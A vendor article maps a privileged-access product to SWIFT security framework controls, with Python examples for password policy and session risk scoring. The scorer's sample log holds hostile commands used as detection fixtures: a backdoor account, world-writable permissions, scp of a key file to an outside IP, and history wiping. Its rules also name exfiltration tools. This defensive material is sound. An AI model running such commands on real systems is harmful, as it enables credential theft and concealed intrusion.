Cyber-attack threats are ever increasing, and there have been recent incidents of payment fraud originating in customers' local environments. SWIFT's payment community continues to suffer numerous cyber-attacks and breaches. For 2020, SWIFT promoted 2 existing advisory controls to mandatory and introduced 2 additional advisory controls, resulting in 21 mandatory and 10 advisory controls in CSCF v2020. SWIFT has also launched the Customer Security Programme (CSP), which aims to improve information sharing throughout the community; through the programme it also shares best practices for fraud detection and enhances support from third-party providers.
Objective 1 of the SWIFT CSP framework is to restrict internet access and protect critical systems from the general IT environment. It covers SWIFT environment protection, i.e. protecting the user's local SWIFT environment from potentially compromising elements of the general IT environment and the external environment. The framework requires that the SWIFT user's environment be segregated from the general IT environment in a secure zone, and that operating system privileged accounts be tightly controlled and access-restricted. It also emphasises securing the virtualisation platforms: every virtualisation platform and virtual machine (VM) hosting SWIFT-related components must be secured to the same level as a physical system.
The Spectra Privileged Access Management (PAM) solution by Sectona, with its hybrid access mechanism, provides secure access to critical systems, including SWIFT infrastructure, for users connecting from either the internal or the external environment. Spectra allows privileged sessions to be accessed through the browser, giving true session isolation, while also allowing direct client-based access without any agent on the target device. Access can also be routed through a secure jump host for session isolation. Spectra is a cross-platform solution: users can take access from any OS and any browser without plugins. Its server privilege management and access control capabilities segregate user access according to workforce roles and responsibilities, so a user cannot reach systems outside that role. Spectra also integrates with virtualisation platforms and VMs, so access to them can be secured to the same effect as for physical systems.
Objective 2 of the framework is to reduce the attack surface and vulnerabilities; control 2.6 requires operator session confidentiality and integrity. Interactive operator sessions connecting to the local SWIFT infrastructure must be protected against attacks on the session path and against the vulnerabilities of the client and server endpoints.
Sessions to the SWIFT infrastructure that are brokered through Spectra PAM are controlled and monitored end to end, protecting the confidentiality and integrity of the session, and every interactive SWIFT session via PAM can be gated by MFA. The threat analytics engine in Spectra PAM additionally assigns each privileged session a composite risk score, which makes auditing and forensics easier and faster.
Control 2.8 of the framework addresses the outsourcing of critical activities. It requires that the local SWIFT infrastructure be protected from the risks introduced by outsourcing critical activities.
Spectra can enforce workflow-based access for outsourced activities, so that access to the SWIFT infrastructure is granted only after review and approval by authorised personnel. For critical activities where a session must be shared over the internet with an outsourced or third-party vendor, Spectra enables secure collaboration without revealing credentials, and generates collaboration logs that identify and record the activities that took place during the session.
Control 2.9 of the framework concerns transaction business controls. All business transactions taking place in the environment must be validated and authorised with the respective counterparties.
In Spectra PAM, time-based access can be granted to users accessing the SWIFT infrastructure, so that access is authorised only within a pre-agreed time window. Workflow-based access can also be enabled so that users receive access only after review and approval; up to 15 levels of approval can be configured in Spectra.
Objective 4 covers prevention of credential compromise. Control 4.1 requires effective password policies: passwords must be resistant to common password attacks.
Spectra PAM has a robust password vault with customisable password change policies that enforce complexity requirements and rotation schedules in a wide range of combinations. Multiple password policies can be created and applied to an individual asset or to a group of assets, and the vault can schedule password changes at regular intervals. Passwords in the vault are encrypted with either AES-256 or RSA-2048.
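The following Python is an added example, not Sectona's or Spectra's code, showing what a password policy that is "resistant to common password attacks" looks like when enforced programmatically: complexity and length rules, a check against a deny-list of common passwords, a rule against repeated characters, a rotation-age check, and a generator that produces vault-rotation passwords satisfying the same policy. The policy values, the deny-list contents and the 30-day rotation window are assumptions chosen for illustration.

```python
from __future__ import annotations

import re
import secrets
import string
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Constructed deny-list standing in for a breached/common password list (illustrative only).
COMMON_PASSWORDS = {"password", "password1", "swift2020", "welcome1", "admin123", "qwerty123"}


@dataclass(frozen=True)
class PasswordPolicy:
    """Assumed policy values; a real deployment would take these from the PAM policy object."""
    min_length: int = 16
    require_upper: bool = True
    require_lower: bool = True
    require_digit: bool = True
    require_symbol: bool = True
    max_repeat: int = 2          # a character may not appear more than this many times in a row
    max_age_days: int = 30       # rotate at least this often
    symbols: str = "!@#$%^&*()-_=+[]{};:,.?/"


def check_password(pw: str, policy: PasswordPolicy = PasswordPolicy()) -> list[str]:
    """Return the list of policy violations; an empty list means the password complies."""
    violations: list[str] = []
    if len(pw) < policy.min_length:
        violations.append(f"shorter than {policy.min_length} characters")
    if policy.require_upper and not any(c.isupper() for c in pw):
        violations.append("no upper-case letter")
    if policy.require_lower and not any(c.islower() for c in pw):
        violations.append("no lower-case letter")
    if policy.require_digit and not any(c.isdigit() for c in pw):
        violations.append("no digit")
    if policy.require_symbol and not any(c in policy.symbols for c in pw):
        violations.append("no symbol")
    # (.)\1{N,} matches N+1 identical consecutive characters, e.g. "aaa" when max_repeat == 2.
    if re.search(r"(.)\1{%d,}" % policy.max_repeat, pw):
        violations.append(f"a character repeats more than {policy.max_repeat} times in a row")
    # Compare both the literal lower-cased password and its letters-only core against the deny-list,
    # so trivial variants such as "Password1!" are still rejected.
    lowered = pw.lower()
    if lowered in COMMON_PASSWORDS or re.sub(r"[^a-z]", "", lowered) in COMMON_PASSWORDS:
        violations.append("matches a common password")
    return violations


def generate_password(policy: PasswordPolicy = PasswordPolicy(), length: int | None = None) -> str:
    """Generate a rotation password with the OS CSPRNG that satisfies the policy."""
    length = length or policy.min_length + 4
    classes = []
    if policy.require_upper:
        classes.append(string.ascii_uppercase)
    if policy.require_lower:
        classes.append(string.ascii_lowercase)
    if policy.require_digit:
        classes.append(string.digits)
    if policy.require_symbol:
        classes.append(policy.symbols)
    alphabet = "".join(classes) or string.ascii_letters + string.digits
    rng = secrets.SystemRandom()
    while True:
        # Guarantee one character from each required class, fill the rest, then shuffle.
        chars = [secrets.choice(cls) for cls in classes]
        chars += [secrets.choice(alphabet) for _ in range(length - len(chars))]
        rng.shuffle(chars)
        candidate = "".join(chars)
        if not check_password(candidate, policy):   # rejects e.g. accidental triple repeats
            return candidate


def rotation_due(last_changed: datetime, policy: PasswordPolicy = PasswordPolicy(),
                 now: datetime | None = None) -> bool:
    """True when the stored credential is older than the policy's maximum age."""
    now = now or datetime.now(timezone.utc)
    return now - last_changed > timedelta(days=policy.max_age_days)


if __name__ == "__main__":
    for pw in ("Password1!", "Caaat-Dooog-Fish-1!", "Tr0ub4dor&3xyzABC!"):
        print(f"{pw!r}: {check_password(pw) or 'OK'}")
    print("generated:", generate_password())
```

The generator loops until `check_password` accepts the candidate, so the policy is enforced in one place and cannot drift between what the vault accepts and what it generates.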
Control 4.2 concerns multi-factor authentication. It requires that the compromise of a single authentication factor not be sufficient to gain access to the SWIFT environment.
Spectra is engineered to integrate readily with MFA providers such as RSA, Vasco, Safenet, Okta, OneLogin, Duo and Google Authenticator. Alternatively, it provides built-in mobile OTP or push authentication, and SMS or email OTP, as second factors. The 2FA mechanism adds a further layer of security and control beyond the password alone.
Objective 5 of the framework concerns managing identities and segregating privileges. Control 5.1 covers logical access control: access must be granted on a need-to-know basis, and duties for operator accounts must be segregated.
Spectra PAM follows the principles of least privilege and segregation of duties, and its attribute-based grouping and AD grouping reduce the manual effort of mapping users to roles and responsibilities.
Control 5.4 concerns the protection of physically and logically stored passwords in the SWIFT environment.
As with control 4.1, stored passwords are held in Spectra's password vault, which applies customisable change policies (complexity and rotation schedules) per asset or asset group, and encrypts the stored passwords with either AES-256 or RSA-2048.
Objective 6 concerns detection of anomalous activity to systems or transaction records. Control 6.4 (logging and monitoring) requires that security events be recorded and that anomalous actions and operations within the local SWIFT environment be detected.
Spectra's Session Recording module captures complete logs of all privileged sessions on target systems, including access to the SWIFT environment. The threat analytics engine within Spectra PAM calculates a composite risk score for each privileged session, which makes auditing and forensics easier and faster. The built-in Risk Scoring engine ships with a list of predefined high-risk scenarios, and the risk level of each scenario can be configured to match the organisation's own risk appetite. The engine computes the composite score for each user session from the activities observed in that session, which is then used to assess access behaviour. Spectra PAM also has an alert and notification engine that sends timely alerts to the responsible personnel when pre-defined critical commands or activities are executed.
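The following Python is an added example, not Spectra's own code, showing how a session risk scorer of the kind described above works: it parses constructed privileged-session log lines, matches each command against configurable high-risk scenarios with per-scenario weights, raises an alert whenever a scenario flagged as critical fires, adds an off-hours factor, and reduces the session to a composite score and risk level. The log line format, the scenario regexes, the weights, the thresholds and the 07:00-19:00 UTC business-hours window are all assumptions chosen for illustration.

```python
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import datetime, timezone

# Constructed sample of a recorded privileged session on a SWIFT host (not real Spectra output).
SESSION_LOG = """\
2020-05-11T02:14:07Z user=jdoe target=swift-aa-01 src=10.0.5.23 cmd="cat /var/log/messages"
2020-05-11T02:15:31Z user=jdoe target=swift-aa-01 src=10.0.5.23 cmd="sudo useradd -m backdoor"
2020-05-11T02:16:02Z user=jdoe target=swift-aa-01 src=10.0.5.23 cmd="sudo chmod 777 /opt/swift/config"
2020-05-11T02:17:45Z user=jdoe target=swift-aa-01 src=10.0.5.23 cmd="scp /opt/swift/config/keys.p12 203.0.113.9:/tmp"
2020-05-11T02:18:10Z user=jdoe target=swift-aa-01 src=10.0.5.23 cmd="history -c"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) user=(?P<user>\S+) target=(?P<target>\S+) src=(?P<src>\S+) cmd="(?P<cmd>.*)"$'
)


@dataclass(frozen=True)
class Event:
    ts: datetime
    user: str
    target: str
    src: str
    cmd: str


# Assumed scenario catalogue: (name, regex over the command, weight, alert immediately?).
# In a PAM product these weights are the "configurable risk levels" an organisation tunes.
DEFAULT_RULES = [
    ("account_creation",    r"\b(useradd|adduser)\b|net user \S+ /add",                        30, True),
    ("world_writable_perm", r"\bchmod\b.*(\b[0-7]{2,3}7\b|\bo\+[rwx]*w)",                      20, True),
    ("data_exfil",          r"\b(scp|sftp|curl|wget|nc)\b.*\b\d{1,3}(\.\d{1,3}){3}\b",         40, True),
    ("log_tampering",       r"(history\s+-c|\brm\b.*/var/log|\bshred\b)",                      25, True),
    ("service_stop",        r"\bsystemctl\s+(stop|disable)\b",                                 15, False),
]
BUSINESS_HOURS = (7, 19)   # assumed window, UTC; activity outside it adds OFF_HOURS_WEIGHT once
OFF_HOURS_WEIGHT = 10


def parse_session_log(text: str) -> list[Event]:
    """Parse the assumed key=value log format into Event records; malformed lines raise."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unparsable session line: {line!r}")
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append(Event(ts, m["user"], m["target"], m["src"], m["cmd"]))
    return events


def score_session(events: list[Event], rules=DEFAULT_RULES,
                  off_hours_weight: int = OFF_HOURS_WEIGHT) -> dict:
    """Compute a composite risk score (0-100), a level, the matched findings and any alerts."""
    score = 0
    findings: list[tuple[str, str]] = []
    alerts: list[str] = []
    off_hours = False
    for ev in events:
        for name, pattern, weight, alert in rules:
            if re.search(pattern, ev.cmd):
                score += weight
                findings.append((name, ev.cmd))
                if alert:   # critical command: notify immediately rather than at session end
                    alerts.append(f"{ev.ts.isoformat()} {ev.user}@{ev.target} {name}: {ev.cmd}")
        if not BUSINESS_HOURS[0] <= ev.ts.hour < BUSINESS_HOURS[1]:
            off_hours = True
    if off_hours and events:
        score += off_hours_weight
        findings.append(("off_hours", f"session activity outside {BUSINESS_HOURS[0]:02d}-{BUSINESS_HOURS[1]:02d} UTC"))
    score = min(score, 100)
    level = "high" if score >= 60 else "medium" if score >= 30 else "low"
    return {"score": score, "level": level, "findings": findings, "alerts": alerts}


if __name__ == "__main__":
    result = score_session(parse_session_log(SESSION_LOG))
    print(f"score={result['score']} level={result['level']}")
    for name, cmd in result["findings"]:
        print(f"  finding {name}: {cmd}")
    for a in result["alerts"]:
        print(f"  ALERT {a}")
```

Keeping the scenario catalogue as data rather than code is what makes the risk levels tunable per organisation; the scoring loop never changes when a weight or a new pattern is added, and the same rules can be replayed over recorded sessions during a forensic review.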
SWIFT has published an extensive list of best practices to be followed; the latest version of the CSCF compliance document is available from SWIFT. For those starting out with a privileged access security programme, begin by identifying and targeting all privileged accounts. Sectona has also published an article on why running isolated privileged sessions for remote users is important.